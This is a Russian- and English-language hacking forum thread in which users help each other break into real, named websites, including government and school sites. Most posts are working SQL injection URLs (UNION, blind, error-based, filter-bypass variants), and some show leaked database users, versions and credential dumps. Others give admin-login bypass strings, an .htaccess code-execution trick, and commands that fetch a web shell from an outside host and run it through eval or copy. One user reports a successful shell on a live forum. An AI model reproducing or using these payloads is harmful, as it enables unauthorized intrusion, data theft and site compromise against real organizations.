http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+

Can't get vuln number?

lightangel said:

Code:
http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+

Can't get vuln number?


http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+

Is this site vulnerable?


Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0

Nothing yet works on it.

lightangel said:
Is this site vulnerable?

Code:
http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0

Nothing yet works on it.


Yes. Its vulnerable


Code:
_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)= 5 TRUE

_ttp://www.zkm.com.cn/en/product_x.php?id=1+and+substring((@@version),1,1)= 4 FALSE

Thank you, I thought as much; Blind SQL Injection.

I'll have my take on it.

Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...

infoseller said:
Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...


Имхо это обычный заголовок, вставляемый в TITLE страницы. Ничего другого без указания линка на ум не идёт...

http://www.oz-gorod.ru/auto_ads.php?aid=3

вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?

qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?


http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1

Ошибка исчезает. Сейчас через ошибку попробую.

--

BigBear, true. Blind =/

qaz said:
http://www.oz-gorod.ru/auto_ads.php?aid=3
вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?


Это Blind-SQL

Обрати внимание на текст под формой


Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 5 TRUE

http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 4 FASLE

User: us2864h@localhost

Database: db2864h

Version: 5.1.57

Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+

shadowrun said:

Code:
http://www.kingston.k12.ok.us/index.php?pageID=3675_2%27+and+1=0+/*!UniOn*/+select+1+--+



http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+

http://www.kingston.k12.ok.us/admin/

обход авторизации в админке

login : admin' or '1'='1

pass: pass' or '1'='1

BigBear said:
Это Blind-SQL
Обрати внимание на текст под формой

Code:
http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 5 TRUE

http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)= 4 FASLE

User: us2864h@localhost

Database: db2864h

Version: 5.1.57



а вопрос насчот

and+substring((@@version),1,1)=5 TRUE

че ето за новый вид разкрютки? где я могу почитать мунал?

Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39



Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?

qaz said:
а вопрос насчот
and+substring((@@version),1,1)=5 TRUE
че ето за новый вид разкрютки? где я могу почитать мунал?


ничго слошного ф разкрютке нетю особа.

ленк (http://tinyurl.com/2aemkg)

lightangel said:

Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?




Code:
http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,1--+f

user():ozchrist_sope1@localhost

version():5.1.56

database():ozchrist_sope1


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+1--+f TRUE

I think, this is blind injection...

Ereee said:

Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+99999999999--+f TRUE
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+gr oup+by+1--+f TRUE

I think, this is blind injection...


лол. там не блинд.


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,us er%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+

При вытаскивании инфы из таблиц, обрамляйте в апострофы имя базы.


Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom +%60information_schema%60.tables+--+

Code:
http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317

Cannot get order by.. Any help please?[/QUOTE]


http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317'+union+/*!select*/+1,2,3,4,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),6,7,8,9,10,11,12,13+--+

http://pavlodarauto[antiG]ru/info/view.php?id=146

_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146




http://pavlodarauto.ru/bd/baraholka_view.php?id=-1+/*!union+select*/+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21--


Плюсек мне

_Spamer_ said:
http://pavlodarauto[antiG]ru/info/view.php?id=146


так можно сделать


http://pavlodarauto.ru/info/view.php?id=-146+union+/*!select*/+1,2,3,4,5,6,/*!concat*/(version(),0x3a,database(),0x3a,user()),8,9,10+--+

Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .

d1v said:
это если юзер один.
а если юзеров > 1, то
File_Priv from mysql.user where user= 'юзер'


а как тут?


PHP:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.use r--+



выводит ошибку


PHP:
http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.use r+where+user=%27u198287@87%27--+



и так тоже ошибка

Datax said:
Еще одна приватная бага ,работает на новых версиях.
Заходим например суда
http://soft.wlok.ru
Делаем запрос
http://soft.wlok.ru/soft/page/99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 99999999999999999999999999999999999999999999999999 999999999999999999/
Цифры девять ,нужно написать слитно.
Видим
http://storage9.static.itmages.ru/i/11/1215/h_1323955118_1765197_eb99d32068.png (http://itmages.ru/image/view/360563/eb99d320)
Раскручивайте дальше сами, я например вытаскивал все пароли и логины.



Как раскручивать такие скули?

Подскажите

Крути как обычно =/

http://site/login_login_groovy/1'+...

lansia1 чет не крутится.. Мб не скулья?

Ereee

Спасибо,понял)

http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+

shadowrun said:
http://pressfortruth.ca/dvd_dtls.php?rid=1%27+group+by+15+--+


Это делается так


http://pressfortruth.ca/dvd_dtls.php?rid=1'+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,(/*!select*/(@x)from(/*!select*/(@x:=0x00),(/*!select*/(null)from(information_schema./*!columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736 368656d61)and(0x00)in(@x:=/*!concat*/(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,c olumn_name))))x),12,13,14,15+--+

er9j6@

Спасибо. Где можно получить подробности об этом способе?

shadowrun said:
er9j6@
Спасибо. Где можно получить подробности об этом способе?


Это просто обход фильтров /*! */ () и т.д.

Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'

Как просмотреть полный путь можно?

dumpers_team said:
Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?


Скорее всего, дефолтные значения вроде index.php и т.п..

А вообще, чем тебе так мешает? хевидж не берёт?

Ещё отснифить можно...

Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?counthit=1%27&newsid=10%27&from=search%27&cid=1%27&searchterm

Got this vuln, no where to start?

Code:
http://www.terengganu.gov.my/maxc2020/portal/cms/redang/index_news.displaynews.php?newsid=-10'+union+select+1,2,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29/*

the site is vulnerable, then the most common sql


Скорее всего, дефолтные значения вроде index.php и т.п..
А вообще, чем тебе так мешает? хевидж не берёт?
Ещё отснифить можно...


интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?


Подскажите плиз, есть несколько сайтов, вроде как есть скули, но на сайтах стоит SEF, так что вижу только линки типа _http://site.com/london/1'
Как просмотреть полный путь можно?


Тебе остается только угадывать. Я не не разу не видел и не использовал sef, не знаю точно как он работает, качать исходники лень, но ссылки у джомлы однотипны, даже в плагинах почти всегда одни и теже параметры встречаются. Так что попробуй что то типа такого


Code:
/index.php?option=com_virtuemart&Itemid=97
/index.php?option=com_content&task=view&id=524&Itemid=271

может и повезет

Thank you so much.

I have a String Based problem again.


Code:
http://motorcitydolls.net/partygal.php?id=-17

Not sure for a solution. Any help?

lightangel said:
Thank you so much.
I have a String Based problem again.

Code:
http://motorcitydolls.net/partygal.php?id=-17

Not sure for a solution. Any help?


I think that its not vulnerable

В редакторе в админке при добавлении вот такого кода сохраняется вот такая штука как обойти её?

есть такой скрипт http://funny-shirt.ru/cat/110/page/1

если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.

но буквы режет, цыфры принимает, помогите раскрутить

system331 said:
есть такой скрипт http://funny-shirt.ru/cat/110/page/1
если прописать так http://funny-shirt.ru/cat/110/page/199999999999999999999999999999999999999999 вадыеш sql ошибку.
но буквы режет, цыфры принимает, помогите раскрутить


это не скуля

_http://funny-shirt.ru/cat/110/page/1*1

_http://funny-shirt.ru/cat/110/page/1*2

интересно, чем и как ты будешь снифать чтобы узнать что скрываеться под чпу ?


Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес

Osstudio said:
Обновим страничку (во время запущенного сниффера), и по идее, высвечивается полный адрес


Где найти такой сниффер? (или отсыпь хотя бы то, что ты постоянно куришь)

Есть чтонить под

FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?

IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?


В паблике точно нету..

при запросе:


http://www.xxx.ru/showimg.php?id=-245+UNION+SELECT+1,2,3,4,5,6,7,8,9,file_priv+from+ mysql.user+where+user=0x6f626c61646d696e5f32--


выдается ошибка:


In module "/showimg.php" found error ="SELECT command denied to user 'u14678'@'10.8.0.28' for table 'user'" in query "select id_watch,title, fnameb, mex, korp, bras, glass, water, newe,opis from watch where id_watch=-245 UNION SELECT 1,2,3,4,5,6,7,8,9,file_priv from mysql.user where user=0x6f626c61646d696e5f32--"


что не так делаю?

IMMORTAL_S said:
Есть чтонить под
FreeBSD 8.1-RELEASE-p5 #10: Fri Sep 30 2011 ?


пробовал? (http://www.exploit-db.com/exploits/18181/)


RFOPlayer said:
что не так делаю?


а у тебя просто прав имхо нет

www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+

Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...

shadowrun said:
www.finance.gov.tt/publications.php?mid=192+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+--+
Ministry of Finance, Republic of Trinidad and Tobago не хочет крититься...


Все крутится


http://www.finance.gov.tt/publications.php?mid=192+and+(select+1+from+(selec t+count(0),concat((select+version()),floor(rand(0) *2))+from+(select+1+union+select+2+union+select+3) x+group+by+2+limit+1)a)

Why does vulnerable number not showing?


Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

lightangel said:
Why does vulnerable number not showing?

Code:
http://safariestate.com.pk/details.php?id=-964 /*!uNiOn*/ /*!all*/ /*!SeleCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



http://safariestate.com.pk/details.php?id=964+and+false+/*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+

Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA

Можно ли раскрутить? и как?

Привет,

есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?

Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.

ПС

Дайте ссылку на пхпмайадмина хостинга infobox.ru

wkar said:
Привет,
есть ли возможность узнать имя фотографии или атача на форуме vbulletin 3.8.4?
Что интересного можно узнать, если есть возможность читать файлы. конфиг смотрел, бд локальная, пма немогу найти.
ПС
Дайте ссылку на пхпмайадмина хостинга infobox.ru


скорее всего в твоем случае vbulletin хранит фотографии в базе а не в фс.

как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)

wkar, тебе надо имя загруженного файла на сервере или имя файла, которое у него было на локальном компе во время загрузки на сервер?

У тебя на компе картинка с аватара лежит(ала) в файле o4ad.gif

как вариант можешь попробовать подключится с теми данными что ты прочитал в конфиге к 3306 порту (дефолтный порт mysql)


Пробовал, не подключается, 61 ошибка.

ПС

хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую

2M_script, название файла не сервере, чтоб в дальнейшем его инклюдить.

wkar said:
хмм, я что-то забыл что можно инклюдить сессии%) Сейчас попробую


Так у тебя читалка или инклуд?

Expl0ited said:
Так у тебя читалка или инклуд?


в одно скрипте читалка, в другом инклуд.

http://help.infobox.ru/11-23


Также Вы можете воспользоваться утилитой PHPMyAdmin перейдя по ссылке http://mysql.infobox.ru


Но что то не открывается этот поддомен.

wkar said:
в одно скрипте читалка, в другом инклуд.


Ну раз инклуд есть, то вариантов много, сессии, логи, временные файлы.

Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.

Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.

Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.

Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?

SecondLife said:
Встретился интересный случай: есть возможность создать в папке файл .htaccess, но проблема в том, что в этой папке больше вообще ничего нет и создать в ней больше ничего невозможно.
Апач файл обрабатывает, но что в него можно написать? Интересует заливка шелла/выполнение PHP команд/чтение файлов.
Директивы логирования не доступны на уровне настроек, да и mod_rewrite не читаем файлы сам, а создаёт подзапрос, тем самым обламывая попытку использовать флаги вроде engine off.


http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html

создаешь .htaccess с таким содержимым:


Code:

Order allow,deny
Allow from all

AddType application/x-httpd-php .htaccess
#

и вызываешь так: site.com/.htaccess?e=phpinfo();


faza02 said:

Code:
SELECT * FROM db WHERE bd1 like '%+order+by+10%00%'

мой запрос в кавычках, как от этого избавиться?


нужно как минимум поставить одинарную кавычку:

SELECT * FROM db WHERE bd1 like '%' order by 100#'

infoseller said:

Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&Itemid=55&type=0&cnid=0&stid=0&maxbed=&sold=0&featured=0&custom4=&custom5=&custom6=&custom7=&custom8=&pets=0&lug=&direction=DESCPRICE&min_squarefeet=&max_squarefeet=&postcode=&radius=&keyword=%27%2F*&cid=0&locid=0&minprice=&maxprice=&minbed=&bathrooms=&parking=&submit=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA

Можно ли раскрутить? и как?


Например так


Code:
http://rentinfo.kz/realestate?option=com_ezrealty&controller=properties&task=results&keyword=1')/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)or/**/('1

Expl0ited, спасибо

запрос схавал, правда реакции нет

http://www.usvieda.org/search.php

уязвимо поле поиска.

faza02 said:
Expl0ited
, спасибо
запрос схавал, правда реакции нет
http://www.usvieda.org/search.php
уязвимо поле поиска.


слоит 'and(select(max(1))from(information_schema.columns )group by(concat(version(),0x00,floor(rand(0)*2))))#

Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )

SELECT * FROM `database`.`table.name`

хех,это замечательно,но в браузере такое не прокатит ведь.Я имел ввиду,что из браузера пытаюсь обратиться к скрипту таким образом,а не из phpMyAdmin или другого клиента.

Breetonia said:
Как можно выбрать данные из бд mysql,в имени которой стоит точка ? Сервер ведь интерпретирует вторую половину имени бд как имя таблицы,а не имя бд,поэтому запросы и не проходят ( сиптом получил все таблицы в бд,а с содержимым - облом )



такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее

CREATE DATABASE `lo.l`;

возвращает "Incorrect database name"

Konqi said:
такое не возможно, мускул тебе не даст создать базу с точкой, смотри там внимательнее


Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать.

Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...

Breetonia said:
Что внимательно ? Я запросил schema_name из information_schema.schemata,вот он мне и выдал такую канитель...Я бы не стал врать.
Хм,твоя правда,но как тогда им такой трюк удался? Или инфа там поддельная ? database() возвращает то же самое...




Expl0ited said:
SELECT * FROM `database`.`table.name`



пробовал так? что отвечает браузер?

поидее должно сработать

Блин,ну я и лох...реально же сработал твой вариант (SELECT * FROM `database`.`table.name`).Спасибо огромное )).Я думал,что апострофы браузер не понимает,ведь так во многих манах пишут...

Вопрос остается открытым - как им удалось создать имя бд с точкой ?

ЗЫ: Сипт идёт лесом,т.к. не обрабатывает апострофы...

Breetonia said:
Вопрос остается открытым - как им удалось создать имя бд с точкой ?


какая версия mysql?

PHP:
CREATE DATABASE`kiss.me`;

CREATE TABLE`kiss.me`.`and_love.me` (

`its.ok`INT NOT NULL

)ENGINE=INNODB;



Это весьма забавно но:


PHP:
CREATE DATABASE`!@#$%^&*(` ;

CREATE TABLE`!@#$%^&*(`.`#$%^&*(` (

`)(*&^%$`INT NOT NULL

)ENGINE=INNODB;

работает вполне адекватно


PHP:
INSERT INTO`#$%^&*(`

VALUES(

'123'

);

SELECT`)(*&^%$`FROM`#$%^&*(`WHERE 1;

>>123

Expl0ited said:

PHP:
CREATE DATABASE`kiss.me`;

CREATE TABLE`kiss.me`.`and_love.me` (

`its.ok`INT NOT NULL

)ENGINE=INNODB;





у меня не катит,

5.0.24а-community-nt

5.0.51a-24+lenny5


CREATE DATABASE `!@#$%^&*(` ;
CREATE TABLE `!@#$%^&*(`.`#$%^&*(` (
`)(*&^%$` INT NOT NULL
) ENGINE = INNODB;


тоже не катит

что у вас за базы?

версию в студию плз

OK - version():5.5.8

NOT - mysql Ver 14.12 Distrib 5.0.92, for redhat-linux-gnu (x86_64) using readline 5.1

ну все ясно, значит фича доступна начиная с версии 5.5 или как то так

ибо все пятые версии провалились

5.0.92-50-log

5.0.24а-community-nt

5.0.51a-24+lenny5

5.0.92

Здравствуйте, есть RFI (пример _http://www.regentbs.ru/index2.php?id=http://www-sbras.nsc.ru/win/mathpub/page-html ), но возможно инклюдить только .html .

Возможно ли залить шелл ?

wkar, file_get_contents - это не RFI. Можно только читать файлы.

Всем привет, подскажите почему не выводит нифига?


PHP:
http://festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28selec t+email+from+u1419187_alpha.jos_users+limit+1,1%29 ,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

Nightmarе said:
Твоя команда limit+1,1 выводит ВТОРОГО пользователя, а не первого, а в таблице он всего один.
Пруф:

Code:
http://festnevest.ru/photo_php.php?id=6+or+(@:=1)||@+group+by+concat((s elect+concat_ws(0x3A,username,0x3a,password,0x3a,u sertype)+from+u1419187_alpha.jos_users+limit+0,1), @:=@-1)having+@||min(@:=0)--+



ясно, спасибо

блин, немогу подобрать количество колонок


PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную

как сюда шелл залить?

http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;


qaz said:
ясно, спасибо
блин, немогу подобрать количество колонок

PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную


у тебя тут похоже эррор бейсед

qaz said:
блин, немогу подобрать количество колонок

PHP:
http://www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--+



уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную




Code:
http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select (@x)from(select(@x:=0x00),(select(0)from(u13567_do y.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e, Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10 ,11,12,13,14--+



547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;


e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php

547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
у тебя тут похоже эррор бейсед


пробуй так

wget http://твой сайт.com/shell.php

или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")

Expl0ited said:
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php


не получиться:

Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

я уже что только не пробовал...

fopen,include,file_get_contents,copy.....

547 said:
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1


В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.

Expl0ited said:
В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.


я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?

547 said:
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?


залей шелл в тмп и инклуди, если так хочется

Konqi said:
залей шелл в тмп и инклуди, если так хочется


хочется, но инклуд здесь не прокатит

547 said:
хочется, но инклуд здесь не прокатит


что значит не прокатит?

разясните

copy('твой_шелл','/tmp/shell');

include('/tmp/shell'); //локальный инклуд

временно сможешь глянуть серв, пока сессия не устареет, а за это время успеешь найти вритабельную папку, или порутить серв если повезет

Konqi said:
что значит не прокатит?
разясните


залить в тмп получилось

потом пробую инклуд

http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=include%28%22/var/www/faunaservis/tmp/xxx.php%22%29;

выдает

Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1

может конечно я что то не то делаю, якобы синтаксис не тот...

к тому же директория темп не видна из инета...

еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));

+ посмотрите что там за ядро


к тому же директория темп не видна из инета...


=\ поэтому и инклудим, а не открываем шелл по прямому адресу

Konqi said:
еще вариант eval-ить удаленно, eval(file_get_contents('шелл, без пхп тегов'));
+ посмотрите что там за ядро
=\ поэтому и инклудим, а не открываем шелл по прямому адресу


ну да..

eval тоже юзал, file_get_contents, d первую очередь пробовал... но увы...

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:file_get_contents("http://.narod.ru/wso2.txt")' WHERE user_id=2;

выдало

Parse error: syntax error, unexpected $end in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code on line 1

Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: file_get_contents(\"http://.narod.ru/wso2.txt\&quot in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php on line 825

ядро

Linux nvh103 2.6.32-5-openvz-amd64 #1 SMP Mon Oct 3 05:12:50 UTC 2011 x86_64

там еще написано

This server is protected with the Suhosin Patch 0.9.6.2

подозреваю что не к добру это)

_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));

wkar said:
_http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&bb=eval(file_get_contents('http://la2evolution.com/w.txt'));


хочешь сказать что у тебя запустился шелл?

547 said:
хочешь сказать что у тебя запустился шелл?


Да, только чуть-чуть поправил


PHP:
UPDATE faunaservis.phpbb_users SET user_sig_bbc ode_uid='(.+)/e\0',user_sig='phpbb:eval(stripslashes($_REQUEST[bb]));'WHERE user_id=2;

PS

там даже папка на залив есть, шелл отправил в пм

Is this website vulnerable?


Code:
http://www.aminfans.com/products.php?p_id=-2

Tried everything still, nothing works.

lightangel said:
Is this website vulnerable?

Code:
http://www.aminfans.com/products.php?p_id=-2

Tried everything still, nothing works.


i don't think so

Thanks.


Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27

Cannot get order by?

2lightangel you yourself are not you ashamed? can all still try to read the manual about sql injections?

lightangel said:
Thanks.

Code:
http://www.barigo.de/shop/front/category_detail.php3?language=l2%27&cat_id=4%27&cat2_id=15%27&item_id=.24%27

Cannot get order by?


/thread43966.html

Напал на след статьи /showthread.php?t=195037

Непонятен вопрос обхода пробелов через магические скобки ))) -


Code:
()

Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.

Как это работает,там не объясняется.

Тут походу используются под запросы, подробней по ссылки ниже.

http://mysql.ru/docs/gruber/mg11.html

Breetonia said:
Напал на след статьи /showthread.php?t=195037
Непонятен вопрос обхода пробелов через магические скобки ))) -

Code:
()

Запросы вида - /script.php?id=(50)union(select(1),database(),2--+) вводят в ступор.
Как это работает,там не объясняется.


Скобки не магические, а круглые http://mysql.ru/docs/man/Parentheses.html

Просто в некоторых случаях, рядом со скобками (как и с некоторыми другими символами, пример && || @) пробел не обязателен.

хелп, немогу подобрать количество полей


PHP:
http://logan.ru/faq.html?id=12'+union+select+1,2,3,4,5,6,7,8,9,10, 12,13--+



есть ли какойеибуть софт который может ето сделать?? потомучто вручную подбирать срехнутя можно

2qaz,


Code:
http://logan.ru/faq.html?id=9999+union+select+1,group_concat(0x3a, version(),user(),3,4,5,6,7,8--+

/showpost.php?p=2789336&postcount=15 неплохой софт для автоматического проведения инъекции.

а вот, ещо вопрос, есть сайт

там вся инфа в таком виде

?????? ???? ????????? ???????????? ? ????? ??????? ??????????? ????????????? ?????? ????????. ????, ????????????? ?? ???? ????? ???

и естественно

из БД при sql-in тоже всё в таком виде, как быть? как в нормальном выде слить базу?

точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.

wkar said:
точно не знаю, но по моему это проблемы из-за кодировки, попробуй изменить кодировку страницы.


как?

В мозиле: Вид - Кодировка и попробуй каждую

wkar said:
В мозиле: Вид - Кодировка и попробуй каждую


а ну ладно, нужные мне данные в БД серовно на английском, они нормально отображаются

тут я столкнулся с другой проблемой, мне надо вывести данные вида маил:пасс

но я столкнулся с такой проблемой,

при такой конструкции concat_ws(0x3a,email,password)

выводит ошибку


PHP:
Illegal mix of collations(binary,COERCIBLE), ( latin1_swedish_ci,IMPLICIT), (cp1251_general_ci,I MPLICIT) foroperation'concat_ws'



